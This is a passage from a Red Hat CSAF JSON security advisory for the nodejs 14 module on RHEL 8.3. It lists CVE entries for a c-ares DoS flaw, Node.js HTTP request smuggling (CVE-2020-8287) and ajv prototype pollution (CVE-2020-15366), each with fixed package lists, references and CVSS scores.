"NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "c-ares: ares_parse_{a,aaaa}_reply() insufficient naddrttls validation DoS" }, { "cve": "CVE-2020-8287", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2021-01-05T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1912863" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs. Affected versions of Node.js allow two copies of a header field in an HTTP request. The first header field is recognized while the second is ignored leading to HTTP request smuggling. The highest threat from this vulnerability is to data confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: HTTP request smuggling via two copies of a header field in an http request", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-8287" }, { "category": "external", "summary": "RHBZ#1912863", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912863" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-8287", "url": "https://www.cve.org/CVERecord?id=CVE-2020-8287" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-8287", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8287" } ], "release_date": "2021-01-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:28:03+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0551" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs: HTTP request smuggling via two copies of a header field in an http request" }, { "cve": "CVE-2020-15366", "cwe": { "id": "CWE-471", "name": "Modification of Assumed-Immutable Data (MAID)" }, "discovery_date": "2020-07-15T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1857977" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-ajv. A carefully crafted JSON schema could be provided that allows execution of other code by prototype pollution. While untrusted schemas are recommended against, the worst case of an untrusted schema should be a denial of service, not execution of code.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function", "title": "Vulnerability summary" }, { "category": "other", "text": "In both OpenShift Container Platform (OCP) and OpenShift ServiceMesh (OSSM), the affected containers are behind OpenShift OAuth authentication. This restricts access to the vulnerable nodejs-ajv library to authenticated users only, therefore the impact is low.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debuginfo-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-debugsource-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-devel-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-docs-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-full-i18n-1:14.15.4-2.module+el8.3.0+9635+ffdf8381.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-nodemon-0:2.0.3-1.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:nodejs-packaging-0:23-3.module+el8.3.0+6519+9f98ed83.src", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:14:8030020210126165503:229f0a1c:npm-1:6.14.10-1.14.15.4.2.module+el8.3.0+9635+ffdf8381.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-15366" }, { "category": "external", "summary": "RHBZ#1857977", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1857977" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-15366", "url": "https://www.cve.org/CVERecord?id=CVE-2020-15366" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-15366", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15366" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-AJV-584908", "url": 